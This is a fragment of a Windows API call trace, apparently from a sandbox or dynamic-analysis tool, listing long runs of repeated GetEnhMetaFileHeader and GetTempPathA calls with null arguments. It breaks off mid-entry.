[0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 